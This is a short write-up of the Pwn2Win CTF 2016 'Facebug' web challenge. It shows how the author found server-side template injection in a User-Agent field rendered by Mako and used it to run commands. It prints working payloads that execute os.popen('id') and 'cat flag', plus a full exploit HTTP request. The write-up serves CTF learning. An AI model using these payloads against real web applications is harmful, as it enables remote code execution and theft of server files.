30-03-2016 / Ctf

Pwn2Win CTF 2016 Facebug Writeup

Below you can find my solution for Facebug task from Pwn2Win CTF 2016.

We get simple page with register and login functionality.

After login, on /profile subpage we can see our login and User Agent.

We try several SQL Injection and XSS attacks, but no luck.

So maybe User Agent ?

After login with <script> as User Agent on page we notice:

<div class="media-body">
	<h5 class="media-heading"><strong>Security alert!</strong></h5>
	<p class="small text-muted"><i class="fa fa-clock-o"></i> 2016-03-26 15:10:11 GMT</p>
	<p>Suspicious activity detected. Alert sent to registered email.</p>
</div>

And indeed we get email message:

Suspecious login from: %our_ip%

So maybe XSS there? Again no luck.

But User Agent seems to be good way to pwn this.

Maybe Server-Side Template Injection ?

Wy try: {{ 7*7 }} and get 49 in response.

After several minutes and different payloads we know its Mako Templates for Python.

It's quite easy to exploit:

<%
import os
x=os.popen('id').read()
%>
${x}

So final solution is:

POST /login HTTP/1.1
Host: facebug.pwn2win.party:8080
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml
Origin: http://facebug.pwn2win.party:8080/register
User-Agent: aaaa <% x=__import__('os').popen('cat flag').read() %> ${x} vv
Content-Type: application/x-www-form-urlencoded
Referer: http://facebug.pwn2win.party:8080/register
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
[email protected]&password=your_pass

And we get email with flag: CTF-BR{Rc3_1N_T3mpL4te_InJect10n_R0CKs_4_L0T}